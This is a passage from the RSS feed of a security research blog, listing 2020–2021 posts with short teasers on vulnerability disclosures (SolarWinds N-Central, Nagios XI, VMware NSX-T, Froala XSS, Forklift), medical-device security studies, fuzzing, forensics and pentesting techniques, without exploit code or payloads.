      <description>&lt;p&gt;I am glad to announce the release of the ERNW whitepaper 71 containing&#xA;information about quarantine file formats of different AV software vendors. It&#xA;is available&#xA;&lt;a href=&#34;https://static.ernw.de/whitepaper/ERNW-Whitepaper-71_AV_Quarantine_signed.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;h2 id=&#34;anti-virus-software&#34;&gt;Anti-Virus Software&lt;/h2&gt;&#xA;&lt;p&gt;I took quarantine files from real-life incidents and created some in a lab&#xA;environment. Afterwards I tried to identify metadata, like timestamps, path&#xA;names, malware names, and the actual malicious file in the quarantine files. One&#xA;goal was to use this information to support our incident analyses: Using the&#xA;results, we can now easily create timelines showing information about&#xA;quarantined files, extract the detected malware, and sometimes even find&#xA;information about processes that created the malicious files.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ManiMed: Philips Medizin Systeme Böblingen GmbH – IntelliVue System Vulnerabilities</title>
      <link>https://insinuator.net/2021/01/manimed-philips-medizin-systeme-b%C3%B6blingen-gmbh-intellivue-system-vulnerabilities/</link>
      <pubDate>Mon, 25 Jan 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/01/manimed-philips-medizin-systeme-b%C3%B6blingen-gmbh-intellivue-system-vulnerabilities/</guid>
      <description>&lt;p&gt;The Federal Office for Information Security (BSI) aims to sensitize&#xA;manufacturers and the public regarding security risks of networked medical&#xA;devices in Germany. In response to the often fatal security reports and press&#xA;releases of networked medical devices, the BSI initiated the project&#xA;Manipulation of Medical Devices (ManiMed) in 2019. In this project, a security&#xA;analysis of selected products is carried out through security assessments&#xA;followed by Coordinated Vulnerability Diclosure (CVD) processes. The project&#xA;report was published on December 31, 2020, and can be accessed on the BSI&#xA;website&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;/&lt;/p&gt;</description>
    </item>
    <item>
      <title>Having Fun with Google MDM Solution</title>
      <link>https://insinuator.net/2021/01/having-fun-with-google-mdm-solution/</link>
      <pubDate>Thu, 21 Jan 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/01/having-fun-with-google-mdm-solution/</guid>
      <description>&lt;p&gt;It’s Friday, you managed to escape for a couple of hours from a busy working day&#xA;to see a doctor. Now you have to wait in a boring waiting room at the clinic&#xA;until it’s your turn to see her majesty. What would you like to do in this time?&#xA;Answer pending business emails, get lost in social media, or choose a new theme&#xA;to make your iPhone look awesome?  What about: all of the above? It’s nice to&#xA;have everything on your iPhone: MDM enrollment to access business data, in&#xA;addition to jailbreak for device freedom. However, MDM solutions ban jailbroken&#xA;devices, because they are not secure enough to handle sensitive business data.&#xA;And so, cat and mouse games of jailbreak detection/bypass between MDM solutions&#xA;and some users develop.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ManiMed: Market Analysis</title>
      <link>https://insinuator.net/2021/01/manimed-market-analysis/</link>
      <pubDate>Mon, 18 Jan 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/01/manimed-market-analysis/</guid>
      <description>&lt;p&gt;The Federal Office for Information Security (BSI) aims to sensitize&#xA;manufacturers and the public regarding security risks of networked medical&#xA;devices in Germany. In response to the often fatal security reports and press&#xA;releases of networked medical devices, the BSI initiated the project&#xA;Manipulation of Medical Devices (ManiMed) in 2019. In this project, a security&#xA;analysis of selected products is carried out through security assessments&#xA;followed by Coordinated Vulnerability Diclosure (CVD) processes. The project&#xA;report was published on December 31, 2020, and can be accessed on the BSI&#xA;website&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pentesting the ELK Stack</title>
      <link>https://insinuator.net/2021/01/pentesting-the-elk-stack/</link>
      <pubDate>Wed, 13 Jan 2021 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2021/01/pentesting-the-elk-stack/</guid>
      <description>&lt;p&gt;With this blog post, I will provide information on how to proceed when testing&#xA;ELK Stack landscapes. Information regarding the exploitation of the ELK Stack is&#xA;very rare on the internet. Therefore, following article aims to provide you with&#xA;some approaches that can be useful during a penetration test.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;All information below were collected during a research project and there is no&#xA;claim for completeness. The guide focuses on ELK Stack deployments for Linux&#xA;machines. Further, this article does not include information for identifying&#xA;misconfigurations in a white-box configuration audit.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW White Paper 70 – HL7 FHIR: Preserving Distributed Resource Integrity</title>
      <link>https://insinuator.net/2020/12/ernw-white-paper-70-hl7-fhir-preserving-distributed-resource-integrity/</link>
      <pubDate>Fri, 18 Dec 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/12/ernw-white-paper-70-hl7-fhir-preserving-distributed-resource-integrity/</guid>
      <description>&lt;p&gt;With this blog post I am pleased to announce the publication of a new ERNW White Paper about the HL7 FHIR communication standard.&lt;/p&gt;&#xA;&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;&#xA;&lt;p&gt;Digital networking is already widespread in many areas of life. More and more medical devices are also being networked in the healthcare industry. This growth makes the development and use of new medical communication standards necessary since existing solutions can only meet the changing requirements with great effort. The HL7 FHIR standard is an example of such a medical communication standard. FHIR is said to have increased the interoperability between different medical contexts,e.g., administration, billing, and clinical care, to enable data exchange of various systems. The FHIR standard addresses the security risks associated with strongly networked communication from a large number of systems across the trust and organizational boundaries only indirectly because FHIR does not define mandatory security controls or requirements.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Root Cause Analysis of a Heap-Based Buffer Overflow in GNU Readline</title>
      <link>https://insinuator.net/2020/12/root-cause-analysis-of-a-heap-based-buffer-overflow-in-gnu-readline/</link>
      <pubDate>Thu, 17 Dec 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/12/root-cause-analysis-of-a-heap-based-buffer-overflow-in-gnu-readline/</guid>
      <description>&lt;p&gt;In the &lt;a href=&#34;https://insinuator.net/2020/12/how-fuzzers-decide-if-a-crash-is-unique/&#34;&gt;last blog post&lt;/a&gt;, we discussed how fuzzers determine the uniqueness of a crash. In this blog post, we discuss how we can manually triage a crash and determine the root cause. As an example, we use a heap-based buffer overflow I found in GNU readline 8.1 rc2, which has been fixed in the newest release. We use GDB and rr for time-travel debugging to determine the root cause of the bug.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisories for SolarWinds N-Central</title>
      <link>https://insinuator.net/2020/12/security-advisories-for-solarwinds-n-central/</link>
      <pubDate>Thu, 10 Dec 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/12/security-advisories-for-solarwinds-n-central/</guid>
      <description>&lt;p&gt;In August 2020 we reported six vulnerabilities in SolarWinds N-Central 12.3.0.670 to the vendor.&lt;/p&gt;&#xA;&lt;p&gt;The following CVE IDs were assigned to the issues :&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;CVE-2020-25617: RCE in N-Central Administration Console (AdvancedScripts Endpoint)&lt;/li&gt;&#xA;&lt;li&gt;CVE-2020-25618: Local Privilege Escalation from nable User to root (N-Central Backend Server)&lt;/li&gt;&#xA;&lt;li&gt;CVE-2020-25619: Access to Internal Services through SSH Port Forwarding (N-Central Backend Server)&lt;/li&gt;&#xA;&lt;li&gt;CVE-2020-25620: SolarWinds Support Account with Default Credentials&lt;/li&gt;&#xA;&lt;li&gt;CVE-2020-25621: Local Database does not require Authentication (N-Central Backend Server)&lt;/li&gt;&#xA;&lt;li&gt;CVE-2020-25622: CSRF in N-Central Administration Console (AdvancedScripts Endpoint)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The vulnerabilities have been found in the course of an extensive research project, in which we analyze the security of multiple Unified Endpoint Management (UEM) solutions. Similar vulnerabilities have been found in other solutions as we pointed out in previous posts about the &lt;a href=&#34;https://insinuator.net/2020/06/security-advisories-for-ivanti-dsm-suite/&#34;&gt;Ivanti DSM Suite&lt;/a&gt; and &lt;a href=&#34;https://insinuator.net/2020/07/security-advisories-for-nagios-xi/&#34;&gt;Nagios XI&lt;/a&gt;. The final outcome of the research project will be published as a whitepaper and possibly conference talk as soon as the project including all disclosure processes concludes.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How Fuzzers Decide if a Crash is Unique</title>
      <link>https://insinuator.net/2020/12/how-fuzzers-decide-if-a-crash-is-unique/</link>
      <pubDate>Thu, 03 Dec 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/12/how-fuzzers-decide-if-a-crash-is-unique/</guid>
      <description>&lt;p&gt;This blogpost sheds some light on how fuzzers handle crash deduplication and what a unique crash is for a fuzzer. For this, we take a look at two contrived examples and compare the unique crashes identified by &lt;a href=&#34;https://github.com/AFLplusplus/AFLplusplus&#34;&gt;AFL++&lt;/a&gt; and &lt;a href=&#34;https://github.com/google/honggfuzz&#34;&gt;honggfuzz&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;Both examples are similar. They read from STDIN, check if the first character of the read data is a digit, then call a vulnerable function. The main difference in &lt;a href=&#34;https://gist.github.com/murx-/5c490c14f4ea994dd7e8bf6d49fdb3b2&#34;&gt;test1.c&lt;/a&gt; is that the program crashes directly in the vuln function due to a null pointer dereference. In &lt;a href=&#34;https://gist.github.com/murx-/98adcbf98806dbe237dc0bff6e03ce6c&#34;&gt;test2.c&lt;/a&gt;, a previously allocated buffer is freed; this buffer is again freed at the end of main, resulting in libc identifying the double free and raising a sigabort.&lt;/p&gt;</description>
    </item>
    <item>
      <title>VMware NSX-T MITM Vulnerability (CVE-2020-3993)</title>
      <link>https://insinuator.net/2020/11/vmware-nsx-t-mitm-vulnerability-cve-2020-3993/</link>
      <pubDate>Thu, 26 Nov 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/11/vmware-nsx-t-mitm-vulnerability-cve-2020-3993/</guid>
      <description>&lt;p&gt;NSX-T is a Software-Defined-Networking (SDN) solution of VMware which, as its basic functionality, supports spanning logical networks across VMs on distributed ESXi and KVM hypervisors. The central controller of the SDN is the NSX-T Manager Cluster which is responsible for deploying the network configurations to the hypervisor hosts.&lt;/p&gt;&#xA;&lt;p&gt;This summer, I looked into the mechanism which is used to add new KVM hypervisor nodes to the SDN via the NSX-T Manager. By tracing what happens on the KVM host, I discovered that the KVM hypervisor got instructed to download the NSX-T software packages from the NSX-T Manager via unencrypted HTTP and install them without any verification. This enables a Man-in-the-Middle (MITM) attacker on the network path to replace the downloaded packages with malicious ones and compromise the KVM hosts.&lt;/p&gt;</description>
    </item>
    <item>
      <title>XSS Vulnerability in Froala WYSIWYG HTML Editor</title>
      <link>https://insinuator.net/2020/11/xss-vulnerability-in-froala-wysiwyg-html-editor/</link>
      <pubDate>Wed, 18 Nov 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/11/xss-vulnerability-in-froala-wysiwyg-html-editor/</guid>
      <description>&lt;p&gt;Recently, I had a brief look at the Froala WYSIWYG HTML Editor (v3.2.0) as there was a &lt;a href=&#34;https://www.mail-archive.com/fulldisclosure@seclists.org/msg06788.html&#34;&gt;post&lt;/a&gt; about it on the Full Disclosure mailing list.&lt;/p&gt;&#xA;&lt;p&gt;When targeting a HTML Editor, I guess one of the first things that everybody does is to check for XSS vulnerabilities. So I tried the usual XSS payloads (a great resource for XSS payloads is the &lt;a href=&#34;https://portswigger.net/web-security/cross-site-scripting/cheat-sheet&#34;&gt;XSS cheat sheet&lt;/a&gt; by PortSwigger) within the editor’s code view, but did not have much luck with the common payloads as they were filtered. However, using the HTML object tag, it was possible to trigger an XSS.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Microsoft Office Telemetry: Report Release</title>
      <link>https://insinuator.net/2020/11/microsoft-office-telemetry-report-release/</link>
      <pubDate>Tue, 17 Nov 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/11/microsoft-office-telemetry-report-release/</guid>
      <description>&lt;p&gt;The &lt;a href=&#34;https://www.bsi.bund.de/&#34;&gt;German Federal Office for Information Security&lt;/a&gt; (orig., ger., Bundesamt für Sicherheit in der Informationstechnik – BSI) has published our report on Microsoft Office Telemetry.&lt;/p&gt;&#xA;&lt;p&gt;Microsoft has released a set of &lt;a href=&#34;https://docs.microsoft.com/en-us/deployoffice/privacy/manage-privacy-controls&#34;&gt;privacy settings&lt;/a&gt; for Office, one of which enables users to configure the type and amount of diagnostic (i.e., telemetry) data that Office may send to Microsoft. When deployed, it is available in the form of a group policy setting. It allows users to configure one of the following diagnostic data levels: &lt;em&gt;required&lt;/em&gt;, &lt;em&gt;optional&lt;/em&gt;, or &lt;em&gt;neither&lt;/em&gt;.  The report we produced:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Forklift &amp;lt;=3.3.9 and &amp;lt;=3.4 Local Privilege Escalations on macOS (CVE-2020-15349/CVE-2020-27192)</title>
      <link>https://insinuator.net/2020/11/forklift-lt3.3.9-and-lt3.4-local-privilege-escalations-on-macos-cve-2020-15349/cve-2020-27192/</link>
      <pubDate>Fri, 13 Nov 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/11/forklift-lt3.3.9-and-lt3.4-local-privilege-escalations-on-macos-cve-2020-15349/cve-2020-27192/</guid>
      <description>&lt;p&gt;I have started to have a look at my local installed helpers on macOS. These helpers are used as an interface for applications to perform privileged operations on the system. Thus, it is quite a nice attack surface to search for Local Privilege Escalations.&lt;/p&gt;&#xA;&lt;p&gt;Forklift is an advanced dual pane file manager for macOS. It is well known under macOS power users.&lt;/p&gt;&#xA;&lt;p&gt;As part of my investigation I identified vulnerabilities in Forklift allowing local privilege escalation.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reversing C&#43;&#43; Without Getting a Heart Attack – DEvirtualize VIrtual Calls With Devi</title>
      <link>https://insinuator.net/2020/11/reversing-c-without-getting-a-heart-attack-devirtualize-virtual-calls-with-devi/</link>
      <pubDate>Thu, 12 Nov 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/11/reversing-c-without-getting-a-heart-attack-devirtualize-virtual-calls-with-devi/</guid>
      <description>&lt;p&gt;TLDR: This blogpost presents &lt;a href=&#34;https://github.com/murx-/devi&#34;&gt;devi&lt;/a&gt;, a tool that can help you devirtualize virtual calls in C++ binaries. It uses Frida to trace the execution of a binary and uncover the call sources and destinations of virtual calls. The collected information can then be viewed in IDA Pro, Binary Ninja, or Ghidra. The plugin adds the respective control-flow edges allowing further analysis (using different plugins) or simply providing more comfort when analyzing C++ binaries.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Apps on Prescription?! – Perspectives on Digital Health Applications (DiGA)</title>
      <link>https://insinuator.net/2020/11/apps-on-prescription-perspectives-on-digital-health-applications-diga/</link>
      <pubDate>Thu, 05 Nov 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/11/apps-on-prescription-perspectives-on-digital-health-applications-diga/</guid>
      <description>&lt;p&gt;Some time ago, we carried out an evaluation of the &lt;em&gt;Digital Health Applications Ordinance&lt;/em&gt; (Digitale-Gesundheitsanwendungen-Verordnung, DiGAV) for the &lt;em&gt;Federal Chamber of Psychotherapists in Germany&lt;/em&gt; (Bundespsychotherapeutenkammer, BPtK) focusing on the security of digital health applications, often referred to as &lt;em&gt;apps on prescription&lt;/em&gt;.&lt;/p&gt;&#xA;&lt;p&gt;The audit was intended to determine to which extent security guidelines, security objectives, and best practices are adhered to by the requirements formulated by the ordinance, thus enabling the foundations to securely operate digital health applications. The main subject of the examination is whether requirements, including procedural requirements defined in the ordinance are sufficient to ensure security of digital health applications. The examination has shown that the requirements can be seen as positive. However, in order to be able to make reliable statements about the IT security of digital healthcare applications, further details and mechanisms should be clarified within the ordinance, which I would like to present in the following.&lt;/p&gt;</description>
    </item>
    <item>
      <title>OpenSIS Vulnerabilities</title>
      <link>https://insinuator.net/2020/10/opensis-vulnerabilities/</link>
      <pubDate>Thu, 15 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/10/opensis-vulnerabilities/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://opensis.com/&#34;&gt;OpenSIS&lt;/a&gt; is an open source student information system. Recently, it was affected by several vulnerabilities such as SQL injections, local file inclusions and incorrect access controls (&lt;a href=&#34;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13380&#34;&gt;CVE-2020-13380&lt;/a&gt;, &lt;a href=&#34;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13381&#34;&gt;CVE-2020-13381&lt;/a&gt;, &lt;a href=&#34;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13382&#34;&gt;CVE-2020-13382&lt;/a&gt;, &lt;a href=&#34;https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13383&#34;&gt;CVE-2020-13383&lt;/a&gt;). That is why I got interested and also had a quick look at the application.&lt;/p&gt;&#xA;&lt;p&gt;As part of this investigation, I discovered two vulnerabilities, an XSS vulnerability (CVE-2020-27409) in the file SideForStudent.php that got quickly fixed after being reported (see commit &lt;a href=&#34;https://github.com/OS4ED/openSIS-Responsive-Design/commit/edca0855e7bc27d5b28dcb2d16f057ada865e282&#34;&gt;edca085&lt;/a&gt; for the details; the commit is included in release v7.5) and some incorrect (i.e. non-existent) access controls for the password change functionality (CVE-2020-27408). In this blog post, I would like to focus on the second vulnerability and describe the tedious disclosure process that – in the end – lead to nothing but the implementation of some ineffective obfuscation mechanism.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Vulnerabilities in GNU Readline Fixed</title>
      <link>https://insinuator.net/2020/10/vulnerabilities-in-gnu-readline-fixed/</link>
      <pubDate>Wed, 07 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/10/vulnerabilities-in-gnu-readline-fixed/</guid>
      <description>&lt;p&gt;Recently I discovered some vulnerabilities in &lt;a href=&#34;https://tiswww.case.edu/php/chet/readline/rltop.html&#34;&gt;GNU Readline&lt;/a&gt;. These bugs have been &lt;a href=&#34;https://lists.gnu.org/archive/html/bug-readline/2020-10/msg00002.html&#34;&gt;fixed&lt;/a&gt; in GNU Readline version 8.1.&lt;/p&gt;&#xA;&lt;p&gt;The case of identifying the vulnerabilities was rather interesting. I wanted to fuzz another program and wrote a quick harness to test if my setup works. This test harness used GNU Readline to read input from stdin and passed the data along to the function under test. I left the fuzzer running while I started to improve the harness (which would also mean getting rid of GNU Readline as it is relatively slow for the use-case at hand). However, AFL showed the first crashes and upon inspection, the vulnerabilities where not in the code I actually wanted to fuzz but in my systems GNU Readline.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Doing it Server-Side with CypherDog 4.0</title>
      <link>https://insinuator.net/2020/09/doing-it-server-side-with-cypherdog-4.0/</link>
      <pubDate>Thu, 17 Sep 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/09/doing-it-server-side-with-cypherdog-4.0/</guid>
      <description>&lt;p&gt;&lt;strong&gt;Arrroooo… Bloodhound Crew!!&lt;/strong&gt; Heard the news? &lt;strong&gt;CypherDog 4.0 is out&lt;/strong&gt; and it’s full of new features…&lt;/p&gt;&#xA;&lt;p&gt;Now a couple of you might be thinking “Hey there, wait a minute… didn’t CypherDog 3.0 come out not that long ago..??”, and I am happy to see some of you are paying attention…&lt;br&gt;&#xA;Indeed, when Bloodhound 3 came out, I quickly updated CypherDog 2 to CypherDog 3 to be compatible with it.&lt;br&gt;&#xA;But Bloodhound 3 is compatible with neo4j 3 and 4, however the neo4j REST API has been deprecated in neo4j 4 and CypherDog 3 relied on it.&lt;br&gt;&#xA;Long story short, CypherDog 4.0 is a full rewrite compatible with the new &lt;strong&gt;neo4j 4 HTTP API&lt;/strong&gt;, and since I was refactoring the whole thing, I added some cool new features to the tool.&lt;br&gt;&#xA;The idea was to be able to do more with less keystrokes, and to do it server-side…&lt;br&gt;&#xA;And so I made a meme.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ERNW White Paper 69 – Safety Impact of Vulnerabilities in Insulin Pumps</title>
      <link>https://insinuator.net/2020/09/ernw-white-paper-69-safety-impact-of-vulnerabilities-in-insulin-pumps/</link>
      <pubDate>Fri, 11 Sep 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/09/ernw-white-paper-69-safety-impact-of-vulnerabilities-in-insulin-pumps/</guid>
      <description>&lt;p&gt;With this blog post I am pleased to announce the publication of a new ERNW White Paper &lt;a href=&#34;https://ernw-research.de/en/whitepapers/issue-69.html&#34;&gt;[1]&lt;/a&gt;. The paper is about severe vulnerabilities in an insulin pump we assessed during project ManiMed and we are proud to publish this subset of the results today.&lt;/p&gt;&#xA;&lt;h2 id=&#34;manipulating-medical-devices&#34;&gt;Manipulating Medical Devices&lt;/h2&gt;&#xA;&lt;p&gt;The German Federal Office for Information Security (BSI), in its role as the Federal Cyber Security Authority in Germany, aims to sensitize manufacturers and the public regarding security risks of networked medical devices. In response to the often fatal security reports and press releases of networked medical devices, the BSI initiated the project Manipulation of Medical Devices (ManiMed) in 2019. In this project, a security analysis of selected products is carried out through security assessments. In the context of this project, severe vulnerabilities were identified during the assessment of the DANA Diabecare RS system.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How can data from fitness trackers be obtained and analyzed with a forensic approach?</title>
      <link>https://insinuator.net/2020/09/how-can-data-from-fitness-trackers-be-obtained-and-analyzed-with-a-forensic-approach/</link>
      <pubDate>Thu, 10 Sep 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/09/how-can-data-from-fitness-trackers-be-obtained-and-analyzed-with-a-forensic-approach/</guid>
      <description>&lt;p&gt;The use of Internet of Things devices is continuously increasing: People buy devices, such as smart assistants, to make their lives more comfortable or fitness trackers to assess sports activities. According to the Pew Research Center [1], every fifth American wears a device to track their fitness. In Germany, the number increases likewise. The increasing number of fitness trackers in use can also be seen in criminal proceedings, as there exist more and more cases where these devices provide evidence.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Puppet Assessment Techniques</title>
      <link>https://insinuator.net/2020/09/puppet-assessment-techniques/</link>
      <pubDate>Wed, 09 Sep 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/09/puppet-assessment-techniques/</guid>
      <description>&lt;p&gt;Hardening guides for different systems that can be managed by Puppet are easy to find, but not the guides for hardening Puppet itself.&lt;/p&gt;&#xA;&lt;p&gt;The enterprise software configuration management (SCM) tool &lt;a href=&#34;https://puppet.com&#34;&gt;Puppet&lt;/a&gt; is valued by many SysAdmins and DevOps, e.g. at &lt;a href=&#34;https://cloud.google.com/blog/products/gcp/introducing-puppet-support-for-google-cloud-platform24&#34;&gt;Google&lt;/a&gt;, for scalable, continuous and secure deployment of application server configuration files across large heterogeneous system landscapes and increasingly also as “&lt;a href=&#34;https://puppet.com/blog/enforcing-cis-compliance-with-puppet/&#34;&gt;end-to-end&lt;/a&gt;” compliance solution.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt;&lt;br&gt;&#xA;This blog post does not present anything new about Puppet security, but aims to raise security awareness and summarize useful attack and audit techniques for an internal black and whitebox infrastructure assessment of a Puppet Enterprise landscape.&lt;br&gt;&#xA;Most information in this post were collected during and based-on a time-limited graybox Puppet landscape assessment (Puppet Enterprise version 6.4.0, on RHEL7).&lt;br&gt;&#xA;Hence, there is no claim for completeness and the post shall not be considered as a fully fledged Puppet hardening guide.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Java Buffer Overflow with ByteBuffer (CVE-2020-2803) and Mutable MethodType (CVE-2020-2805) Sandbox Escapes</title>
      <link>https://insinuator.net/2020/09/java-buffer-overflow-with-bytebuffer-cve-2020-2803-and-mutable-methodtype-cve-2020-2805-sandbox-escapes/</link>
      <pubDate>Wed, 02 Sep 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/09/java-buffer-overflow-with-bytebuffer-cve-2020-2803-and-mutable-methodtype-cve-2020-2805-sandbox-escapes/</guid>
      <description>&lt;p&gt;Years ago, Java could be used on websites trough applets. To make these applets secure and not let them access files or do other dangerous stuff, Java introduced the SecurityManager. Before some action was performed, the SecurityManager was asked if the code is privileged to perform this action. However, since the SecurityManager lives in the same running program and can be accessed via System.getSecurityManager(), there &lt;a href=&#34;http://www.phrack.org/papers/escaping_the_java_sandbox.html&#34;&gt;existed some ways to remove it&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisories for Nagios XI</title>
      <link>https://insinuator.net/2020/07/security-advisories-for-nagios-xi/</link>
      <pubDate>Thu, 30 Jul 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/07/security-advisories-for-nagios-xi/</guid>
      <description>&lt;p&gt;In June 2020 we reported three vulnerabilities in Nagios XI 5.7.1 to the vendor.&lt;br&gt;&#xA;The following CVE IDs were assigned to the issues :&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt; CVE-2020-15901: Command Injection in Nagios XI web interface (RCE)&lt;/li&gt;&#xA;&lt;li&gt; CVE-2020-15902: Cross Site Scripting (XSS)&lt;/li&gt;&#xA;&lt;li&gt; CVE-2020-15903: Reserved, details will be given on vendor fix&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;CVE-2020-15901 and CVE-2020-15902 have meanwhile been fixed in version 5.7.2 according to the changelog on the Nagios website (&lt;a href=&#34;https://www.nagios.com/downloads/nagios-xi/change-log/)&#34;&gt;https://www.nagios.com/downloads/nagios-xi/change-log/)&lt;/a&gt;. CVE-2020-15903 is currently being worked on by the vendor and will probably be fixed in the near future.&lt;/p&gt;</description>
    </item>
    <item>
      <title>ACM WiSec 2020</title>
      <link>https://insinuator.net/2020/07/acm-wisec-2020/</link>
      <pubDate>Sun, 26 Jul 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/07/acm-wisec-2020/</guid>
      <description>&lt;p&gt;Last week I attended &lt;a href=&#34;https://wisec2020.ins.jku.at/&#34;&gt;ACM WiSec&lt;/a&gt;. Of course, only virtually. The first virtual conference I attended. Coincidentally, it was also the first conference I presented at. While the experience was quite different from a “real” conference, the organizers did a great job to make the experience as good as possible with, for example, a mattermost instance to interact with other conference participants.&lt;/p&gt;&#xA;&lt;p&gt;In the following, I will list a few talks and papers that I either found very interesting or that generally stood out to me:&lt;/p&gt;</description>
    </item>
    <item>
      <title>QEMU, Unicorn, Zelos, and AFL</title>
      <link>https://insinuator.net/2020/07/qemu-unicorn-zelos-and-afl/</link>
      <pubDate>Wed, 15 Jul 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/07/qemu-unicorn-zelos-and-afl/</guid>
      <description>&lt;p&gt;I should start by telling you that this post does not contain anything fundamentally new. Hence, if you already know the tools mentioned in the title, this post may probably not be for you. However, if you are not too familiar with these tools and want to understand a little bit more on how they work together, you should keep on reading.&lt;/p&gt;&#xA;&lt;p&gt;First, let us get a high-level overview of the different tools. We begin with QEMU. &lt;a href=&#34;https://www.qemu.org/&#34;&gt;QEMU&lt;/a&gt; is a piece of software to emulate hardware such as processors. Imagine, for example, that you are running an operating system such as Linux or Windows on a x86-64 machine and that you would like to analyze a binary that has been compiled for an ARM or MIPS processor. Of course, you can use static analysis on the binary, but if you want to find out more about the runtime behavior, well, it would be good to have a corresponding runtime environment.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Advisories for Ivanti DSM Suite</title>
      <link>https://insinuator.net/2020/06/security-advisories-for-ivanti-dsm-suite/</link>
      <pubDate>Tue, 23 Jun 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/06/security-advisories-for-ivanti-dsm-suite/</guid>
      <description>&lt;p&gt;From the end of 2019 on, we reported two critical vulnerabilities in the Ivanti DSM Suite to the vendor. The following CVE IDs were assigned to the issues (but note that they have a status of RESERVED, i.e. titles and descriptions may change in the future):&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;CVE-2020-12441: Denial-of-Service (DoS) in Ivanti Service Manager HEAT Remote Control 7.4&lt;/li&gt;&#xA;&lt;li&gt;CVE-2020-13793: Unsafe storage of AD credentials in Ivanti DSM netinst 5.1&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;The vulnerabilities have meanwhile been fixed and an updated software version can be downloaded &lt;a href=&#34;http://forums.ivanti.com/s/article/Ivanti-DSM-Download-Center&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Back from the ATT&amp;amp;CK jungle…</title>
      <link>https://insinuator.net/2020/05/back-from-the-attampck-jungle/</link>
      <pubDate>Wed, 06 May 2020 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2020/05/back-from-the-attampck-jungle/</guid>
